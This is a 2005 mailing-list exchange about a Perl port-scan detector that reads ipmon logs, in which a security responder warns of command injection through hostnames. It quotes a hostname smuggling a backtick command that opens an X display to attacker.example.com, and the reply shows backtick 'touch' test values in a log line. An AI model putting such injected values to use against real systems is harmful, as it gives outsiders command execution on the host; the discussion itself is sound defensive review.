Hi Jefferson, Thank you for your reply, and an interesting point.
I verified that an entry with backticks in the ipmon log file doesn't execute by echoing a line: 17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.`touch /hi`.120.46,1364 -> 216.34.`touch /bye`.168,139 PR tcp len 20 48 -S 2163595220 0 65535 IN Just to make sure, I'll include the -T switch with the interpreter, and add a line: $line_orig =~ s/\`//g; just after it reads in the line. Also, there should be support for hostname resolution or IP addresses, rather than just IP addresses. I'll add that in. Sentrytools is an interesting project. The concept of th MOAN project is to provide a small base Perl script, rather than C, for people who want a port scan detection function, or to be able to easily branch off and write functions for other network events using Perl. Again, thank you for your input. Regards, Dan Sopher --- Jefferson Ogata <[EMAIL PROTECTED]> wrote: > Dan S wrote: > > Hi. I'm not sure if my last email went through > > correctly, so please excuse this if it's a repost. > I > > uploaded a Perl script that works with ipmon and > log > > rules. It detects port scans, and enters the IP > > address into the rules file, and dynamically > blocks > > the host. If you are interested, the script is on > > sourceforge at: > > You might want to consider what happens if someone > has hostname > resolution enabled in ipmon, starts running this > script (admittedly it > won't work well if ipmon is logging hostnames, but > someone might not > realize that), and an attacker performs a portscan > from an IP that > resolves to, say, 123."`xterm -display > attacker.example.com:0.0`".example.com... > > You also might want to have a look at portsentry if > you're not familiar > with it. > > http://sourceforge.net/projects/sentrytools/ > > -- > Jefferson Ogata <[EMAIL PROTECTED]> > NOAA Computer Incident Response Team (N-CIRT) > <[EMAIL PROTECTED]> > __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
